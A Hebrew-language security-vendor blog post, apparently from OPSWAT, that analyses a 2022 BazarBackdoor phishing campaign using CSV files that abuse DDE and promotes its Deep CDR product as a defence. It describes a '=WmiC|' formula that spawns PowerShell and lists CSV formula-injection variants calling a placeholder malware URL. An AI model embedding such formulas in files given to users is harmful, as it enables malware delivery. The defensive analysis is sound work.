בפברואר 2022, חוקר תוכנות זדוניות כריס קמפבל זיהה קמפיין פישינג חדש המשתמש בקבצי טקסט CSV (ערכים מופרדים בפסיקים) מעוצבים במיוחד כדי להדביק את מכשירי המשתמשים בטרויאן BazarBackdoor. בפוסט בבלוג זה, אנו מנתחים את תרחיש ההתקפה ונראה לכם כיצד למנוע מתקפה מתוחכמת זו באמצעות Deep CDR (Content Disarm and Reconstruction).
טקטיקת ההתקפה
בקמפיין פישינג זה, פושעי הסייבר השתמשו בקובץ CSV - קובץ טקסט מופרד המאחסן נתונים בפורמט טבלה ומשתמש בפסיק כדי להפריד בין ערכים. סוג קובץ זה הוא דרך פופולרית להחלפת נתונים פשוטים בין מסדי נתונים ויישומים. מכיוון שקובץ CSV מכיל פשוט טקסט ללא קוד הרצה, משתמשים רבים חושבים שהוא אינו מזיק ופותחים את המסמך במהירות ללא זהירות. הם אינם חושדים שהקובץ עלול להיות וקטור איום שדרכו תוכנות זדוניות יכולות להגיע למכשירים שלהם אם קובץ ה-CSV נפתח עם יישומים התומכים בחילופי נתונים דינמיים (DDE), כגון Microsoft Excel ו-OpenOffice Calc. יישומים אלה יכולים לבצע את הנוסחאות והפונקציות בקובץ ה-CSV. מחברי איומים מנצלים לרעה את תכונת DDE הזו כדי לבצע פקודות שרירותיות, המורידות ומתקינות את הטרויאן BazarBackdoor, כדי לפגוע ולקבל גישה מלאה לרשתות ארגוניות ממכשיר הקורבן הלא זהיר. בהשוואה לגישות התקפה פופולריות עם מאקרו זדוני או קוד VBA המוסתרים בקובץ MS Office, איומים המוסתרים בתוך מסמכי DDE קשים יותר לזיהוי.
בבדיקה מדוקדקת של הקובץ, אנו יכולים לראות פקודה =WmiC| (פקודת ממשק ניהול Windows) הכלולה באחת מעמודות הנתונים. אם הקורבנות יאפשרו בטעות לפונקציית DDE זו לפעול, היא תיצור פקודת PowerShell. הפקודות יפתחו לאחר מכן כתובת URL מרוחקת להורדת BazarLoader ו-BazarBackdoor יותקן במחשב הקורבן.
אֵיך Deep CDR עוזר לך להתגונן מפני התקפות DDE
ניתן להגן על הרשת שלכם מפני קמפיינים מתוחכמים של פישינג על ידי ניקוי קבצים המצורפים למיילים לפני שהם מגיעים למשתמשים שלכם. מתוך תפיסה שכל קובץ מהווה איום פוטנציאלי ובהתמקדות במניעה ולא רק בגילוי, Deep CDR מסיר את כל התוכן הפעיל בקבצים תוך שמירה על אותה שמישות ופונקציונליות של הקובץ. Deep CDR היא אחת משש הטכנולוגיות המרכזיות ב MetaDefender - OPSWAT פלטפורמת מניעת איומים מתקדמת של, אשר מאמצת באמת את פילוסופיית אפס אמון.
להלן פרטי החיטוי לאחר שעיבדנו את קובץ ה-CSV הנגוע באמצעות MetaDefender Core (ניתן גם לעיין בתוצאות הסריקה ב MetaDefender Cloud ). Deep CDR ניטרלו את הנוסחה בקובץ כך שלא נוצרה פקודת PowerShell. לאחר מכן לא ניתן היה להוריד את התוכנה הזדונית.
בהתקפות דומות, יוצרי איומים משתמשים בנוסחאות מורכבות יותר כדי להתחמק מגילוי. בדרך כלל, נוסחאות ב-MS Excel מתחילות בסימן שוויון (=). עם זאת, מכיוון שיישום זה מקבל גם נוסחאות המתחילות בסימן אחר, כגון "=+" או "@", במקום רק "=", הנוסחה ההרסנית בקבצי CSV יכולה להיות:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
נוסחאות מסוג זה יכולות לחמוק מכמה מערכות CDR נפוצות. עם זאת, Deep CDR יכול להתמודד בקלות עם טקטיקה זו ולהפיק קבצים נקיים ובטוחים לצריכה ובכך לנטרל את האיום.
למדו עוד על Deep CDR או שוחחו עם מומחה טכני OPSWAT כדי לגלות את פתרונות האבטחה הטובים ביותר להגנה על הרשת הארגונית והמשתמשים שלכם מפני התקפות יום אפס ותוכנות זדוניות מתקדמות.
